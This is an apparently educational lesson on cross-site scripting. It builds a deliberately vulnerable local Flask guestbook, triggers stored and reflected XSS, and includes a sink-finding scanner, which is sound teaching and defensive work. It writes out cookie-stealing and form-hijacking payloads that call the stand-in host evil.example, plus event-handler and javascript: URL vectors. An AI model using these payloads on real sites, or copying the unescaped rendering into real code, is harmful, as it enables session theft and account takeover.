PY-L8-32 · A07 — XSS: Cross-Site Scripting Attack

Learning Goals

3 min

By the end of this lesson you can:

Explain XSS as injection into the browser's HTML/JS context.
Distinguish stored, reflected, and DOM-based XSS.
Demonstrate a stored-XSS payload on a deliberately vulnerable local app.
Describe the impact (session theft, defacement) — defence is next lesson.

⚠️ Local, deliberately-broken demo only

The XSS payloads here run against a tiny Flask app you write and run on 127.0.0.1, with your own browser. Injecting scripts into any site you don't own is an attack on its real users — illegal and harmful. We demo locally to understand the mechanism and build the defence (Lesson 33).

Warm-Up · The Comment That Runs Code

5 min

A comment form stores whatever you type and shows it to all visitors.
You post:   <script>alert('XSS')</script>
The server saves it, then renders it into the page HTML unescaped.
Every visitor's browser now RUNS your script as if the site wrote it.

Today's big idea

XSS is injection — but the interpreter is the browser, not the database. When a web app inserts untrusted input into a page without escaping it, the input can include <script> (or event handlers, etc.) that the browser executes in the victim's session. Same root cause as SQLi (untrusted data crossing into a code context — Lesson 2), different victim: your users' browsers. And because it runs as your site, it can steal sessions, keystrokes, and more.

New Concept · The Three Types & The Impact

14 min

The vulnerable pattern

from flask import Flask, request
app = Flask(__name__)
comments = []

# VULNERABLE — user input rendered into HTML without escaping
@app.post("/comment")
def add_comment():
    comments.append(request.form["text"])     # store raw input
    return "saved"

@app.get("/comments")
def show():
    # f-string-building HTML from raw input → XSS sink
    return "<h1>Comments</h1>" + "".join(f"<p>{c}</p>" for c in comments)

Any place raw input lands in HTML/JS unescaped is an XSS sink: f-string HTML, innerHTML = userInput, Jinja's | safe filter, React's dangerouslySetInnerHTML, or marking a string "safe" when it isn't.
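
To see why these sinks matter, the sketch below uses Python's standard-library html.parser as a rough stand-in for a browser's parser and lists the start tags it finds in a rendered fragment. The names render_comment, tags_in, and TagCollector are illustrative assumptions, not part of the lesson's app.

```python
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Records every start tag the parser encounters."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def render_comment(text: str) -> str:
    # Same vulnerable pattern as above: raw input dropped into HTML.
    return f"<p>{text}</p>"


def tags_in(html: str) -> list[str]:
    collector = TagCollector()
    collector.feed(html)
    collector.close()
    return collector.tags


print(tags_in(render_comment("nice post!")))                      # ['p']
print(tags_in(render_comment("<script>alert('XSS')</script>")))   # ['p', 'script']
```

The second result shows the point: once the input is in the page, the parser cannot tell the attacker's tag from the site's own markup.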

The three types

STORED (persistent)   payload saved server-side, served to EVERY visitor
                      e.g. a malicious comment → worst, widest blast radius
REFLECTED             payload in a URL/param, reflected back in the response
                      e.g. search?q=<script>... in a link sent to a victim
DOM-BASED             client-side JS writes untrusted data into the DOM
                      e.g. element.innerHTML = location.hash

Stored XSS is usually the most dangerous because it hits every visitor automatically; reflected XSS needs the victim to open a crafted link; DOM-based XSS happens entirely in front-end JS, so the payload may never appear in the server's response.
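
The difference between stored and reflected can be sketched without a web server. This toy model is an assumption-laden simplification (the function names are hypothetical): it only tracks where the payload lives and which requests receive it.

```python
# Toy model (no web server): contrasts where the payload lives.
stored_comments: list[str] = []          # stands in for server-side storage


def post_comment(text: str) -> None:
    stored_comments.append(text)         # stored: the payload persists


def comments_page() -> str:
    # Every later request gets the saved payload, whatever the visitor sent.
    return "".join(f"<p>{c}</p>" for c in stored_comments)


def search_page(q: str) -> str:
    # Reflected: the payload exists only in this one request's response.
    return f"<p>Results for: {q}</p>"


PAYLOAD = "<script>alert(1)</script>"

post_comment(PAYLOAD)                    # attacker posts once
victim_view = comments_page()            # victim sends nothing special
print(PAYLOAD in victim_view)            # True

print(PAYLOAD in search_page("cats"))    # False: an ordinary search is clean
print(PAYLOAD in search_page(PAYLOAD))   # True: only the crafted request
```

DOM-based XSS is not modelled here because it happens in client-side JavaScript rather than in the server's response.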

What an XSS payload can do

<!-- runs in the VICTIM's browser, AS your trusted site: -->
<script>fetch('https://evil.example/steal?c=' + document.cookie)</script>
<!-- sends every cookie JavaScript can read (any not flagged HttpOnly) to the attacker, who can then log in as the victim -->

<script>document.querySelector('form').action = 'https://evil.example'</script>
<!-- redirects the login form to harvest credentials -->

Why XSS is so damaging

The script runs with your site's full privileges in the victim's session. It can steal session cookies (account takeover), keylog, perform actions as the user (transfer money, change settings), deface the page, or spread (an XSS worm). One unescaped field can compromise every visitor.

The defence (a teaser): two parts

The fix (Lesson 33) has two parts: escape output by context (HTML-escape so <script> becomes harmless text), and set a Content Security Policy that tells the browser not to run inline/untrusted scripts. Modern frameworks auto-escape by default; XSS usually appears when you opt out of that protection.
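
As a small preview of the first part, here is a minimal sketch using the standard library's html.escape. It covers only text placed in an HTML body; attributes, URLs, and JavaScript contexts need their own handling.

```python
import html

payload = "<script>alert('XSS')</script>"

# html.escape replaces &, <, > and (by default) both quote characters
# with HTML entities, so the browser displays the text instead of parsing it.
escaped = html.escape(payload)

print(escaped)
# &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;

print(f"<p>{escaped}</p>")   # safe to place inside an HTML element body
```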

Worked Example · Stored XSS in a Local Demo

12 min

Goal: a tiny local comment app with a stored-XSS bug; post a (harmless) payload and watch it execute in your own browser — proving the mechanism. Your machine only.

# vulnerable_xss.py — DELIBERATELY broken; run locally only
from flask import Flask, request
app = Flask(__name__)
comments = []

PAGE = """<!doctype html><h1>Guestbook</h1>
<form method=post action=/comment>
  <input name=text><button>post</button></form>
{rendered}"""

@app.post("/comment")
def add():
    comments.append(request.form["text"])         # store raw (vulnerable)
    return PAGE.format(rendered=render())

@app.get("/")
def index():
    return PAGE.format(rendered=render())

def render():
    # ✗ raw input concatenated into HTML → stored XSS sink
    return "".join(f"<div class=comment>{c}</div>" for c in comments)

if __name__ == "__main__":
    app.run(port=5000)      # http://127.0.0.1:5000 — your machine

# In YOUR browser at 127.0.0.1:5000, post this comment:
<script>alert('XSS — this runs as the site')</script>

# Result: every time the page loads, the alert fires — your script
# is now part of the page, executing in every visitor's browser.
# A real attacker would post:  <script>fetch('//evil/?c='+document.cookie)</script>
# (we use a harmless alert; never deploy this app).

Read the code

The bug is the one line in render(): raw comment text is concatenated straight into HTML. When you post <script>...</script>, the server stores it and serves it back inside the page, so the browser parses it as a real script tag and runs it — for every visitor (stored XSS). Note the parallel to SQLi: untrusted input crossed a boundary into a code context (HTML/JS instead of SQL). The harmless alert stands in for what a real payload would do (cookie theft). Next lesson, escaping this one output turns <script> into visible, inert text.

Try It Yourself

13 min

Your own local demo or OWASP Juice Shop's XSS challenges (Lesson 27) — safe, intentional targets. Use harmless payloads (alert), never real cookie-stealing endpoints.

01 🟢 Trigger stored XSS

Run the demo and post a harmless <script>alert(1)</script>. Confirm it executes on page load. View the page source to see your script embedded in the HTML.

02 🟡 Reflected variant

Add a search route that reflects ?q=... back into the page unescaped. Confirm a payload in the URL executes — and note that this needs the victim to open a crafted link (vs. stored, which is automatic).

Hint

@app.get("/search")
def search():
    q = request.args.get("q", "")
    return f"<p>Results for: {q}</p>"     # ✗ reflected XSS
# /search?q=<script>alert('reflected')</script>
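
When you test the reflected route, the payload has to travel inside a URL, so characters like < and > should be percent-encoded. A sketch with urllib.parse, assuming the local demo address used in this lesson and the /search route from the hint:

```python
from urllib.parse import parse_qs, urlencode, urlsplit

BASE = "http://127.0.0.1:5000/search"      # the local demo only
payload = "<script>alert('reflected')</script>"

# urlencode percent-encodes characters such as < > ' ( ) so the
# payload survives as a single query parameter.
link = f"{BASE}?{urlencode({'q': payload})}"
print(link)

# What a server decodes from the query string (Flask's request.args
# performs the equivalent decoding before your route sees the value).
decoded = parse_qs(urlsplit(link).query)["q"][0]
print(decoded == payload)   # True
```

The encoded link looks harmless at a glance, which is part of why reflected XSS works through links sent to a victim.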

03 🔴 Non-script payloads

Show that XSS isn't only <script>: trigger script execution via an event handler attribute (e.g. <img src=x onerror=alert(1)>). Explain why blacklisting the word "script" is a useless defence (a teaser for proper output encoding).

Hint

<img src=x onerror=alert(1)>     ← no <script> tag, still runs JS
<svg onload=alert(1)>
<a href="javascript:alert(1)">x</a>
→ there are dozens of vectors. Blacklisting can't cover them all;
  CONTEXT-AWARE OUTPUT ESCAPING (next lesson) neutralises all of them.
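
To make the blacklisting point concrete, here is a sketch of a hypothetical filter (naive_filter is an invented name) that deletes the word "script", followed by inputs that get past it.

```python
import re


def naive_filter(text: str) -> str:
    """Hypothetical blacklist: delete every occurrence of 'script'."""
    return re.sub("script", "", text, flags=re.IGNORECASE)


attempts = [
    "<script>alert(1)</script>",               # the one case it stops
    "<img src=x onerror=alert(1)>",            # no 'script' to remove
    "<svg onload=alert(1)>",                   # same
    "<scrscriptipt>alert(1)</scrscriptipt>",   # removal rebuilds the tag
]

for attempt in attempts:
    print(f"{attempt!r} -> {naive_filter(attempt)!r}")
```

The last case is the instructive one: a single-pass removal turns <scrscriptipt> back into <script>, so the filter itself produces the tag it was meant to block.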

Mini-Challenge · An XSS Sink Finder

8 min

Build a static scanner that flags likely XSS sinks in a codebase: Jinja | safe, Markup(...), f-strings/concatenation building HTML from variables, JS innerHTML =, and React dangerouslySetInnerHTML. Report file + line, since each is a place auto-escaping was bypassed.

Show a sample solution

import re
from pathlib import Path

SINKS = {
    "Jinja | safe": re.compile(r"\|\s*safe"),
    "Markup()":      re.compile(r"Markup\("),
    "innerHTML":     re.compile(r"\.innerHTML\s*="),
    "dangerouslySetInnerHTML": re.compile(r"dangerouslySetInnerHTML"),
    # "<" then a later "{" inside the same literal, so f"<p>{x}" matches
    "f-string HTML": re.compile(r"f['\"]<[^'\"]*\{"),
}

def scan(path: str) -> None:
    for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1):
        for name, pat in SINKS.items():
            if pat.search(line):
                print(f"{path}:{n}: ⚠️ XSS sink ({name}) — ensure output is "
                      f"escaped for its context")
                print(f"    {line.strip()}")

scan("templates_or_views.py")
# Each hit = auto-escaping bypassed → verify the data is trusted/escaped.

Non-negotiables: flags the common framework escape-bypasses, reports file:line, frames each as "auto-escaping bypassed — verify."
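
To check a scanner like this without touching the filesystem, one option is a variant that takes source text and returns its hits. The sketch below is self-contained and uses an illustrative subset of the patterns; find_sinks, SAMPLE, and this f-string pattern are assumptions of the sketch, not part of the sample solution.

```python
import re

# Illustrative subset of the patterns above. The f-string pattern looks
# for "<" and a later "{" inside the same string literal.
SINKS = {
    "Jinja | safe": re.compile(r"\|\s*safe\b"),
    "innerHTML": re.compile(r"\.innerHTML\s*="),
    "f-string HTML": re.compile(r"""\bf['"][^'"]*<[^'"]*\{"""),
}


def find_sinks(source: str) -> list[tuple[int, str]]:
    """Return (line_number, sink_name) for each pattern hit in source."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for name, pat in SINKS.items():
            if pat.search(line):
                hits.append((n, name))
    return hits


SAMPLE = '''\
def render():
    return "".join(f"<div class=comment>{c}</div>" for c in comments)
title = "<h1>Guestbook</h1>"
el.innerHTML = location.hash
{{ bio | safe }}
'''

for lineno, name in find_sinks(SAMPLE):
    print(f"sample:{lineno}: {name}")
```

Line 3 of the sample is static HTML with no interpolation, so it is not flagged; a line-based regex scanner like this will still miss multi-line strings and produce false positives, so treat each hit as a prompt to review rather than a verdict.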

Recap

3 min

XSS is injection into the browser: untrusted input rendered into a page without escaping becomes executable script in your visitors' sessions. There are three types: stored (saved and served to all, the worst), reflected (in a URL, needs a click), and DOM-based (client-side JS). It can steal session cookies, act as the user, deface, and spread. The sink is any unescaped output of user data into HTML/JS, and it's not just <script> (event handlers, javascript: URLs, etc.), so blacklisting fails. We demonstrated stored XSS on a local app with a harmless alert; the real defence, context-aware output escaping plus a Content Security Policy, is next lesson.

Vocabulary Card

XSS: Cross-Site Scripting — running attacker JS in victims' browsers via unescaped output.
stored vs reflected: Persisted & served to all vs. reflected from a request (needs a click).
XSS sink: Where untrusted data is written into HTML/JS unescaped.
session theft: Stealing the session cookie to impersonate the victim — a top XSS payload.

Homework

4 min

On your local demo (or Juice Shop), trigger a stored XSS and a reflected XSS with harmless alert payloads, and view the source to see your input embedded in the HTML. Demonstrate at least one non-<script> vector. Build the XSS-sink scanner and run it on a project. Write a paragraph: why XSS is "injection into the browser," what a real payload would steal, and why you only ever test this on your own/authorised targets.

Sample · XSS explainer

XSS is "injection into the browser": just as SQLi makes the DATABASE
run attacker input as SQL, XSS makes the BROWSER run attacker input as
JavaScript. The cause is identical — untrusted data placed into a code
context (here, HTML/JS) without escaping. The victim is different: my
site's visitors, in their own logged-in sessions.

What a real payload would steal: the session cookie
(<script>fetch('//evil/?c='+document.cookie)</script>) → the attacker
pastes it into their browser and is now logged in AS the victim. It
could also keylog, submit forms as the user, or deface the page. I
used a harmless alert(1) in testing.

Why only my own targets: a working XSS attacks real PEOPLE (the site's
users), not just a server — injecting scripts into a site I don't own
harms its visitors and is illegal. I test on my local demo and Juice
Shop's XSS challenges, which are built for exactly this.

Non-negotiables: reproduced stored + reflected XSS (harmless payloads) on a local/authorised target, a non-script vector, the scanner, and a clear mechanism + ethics explanation.
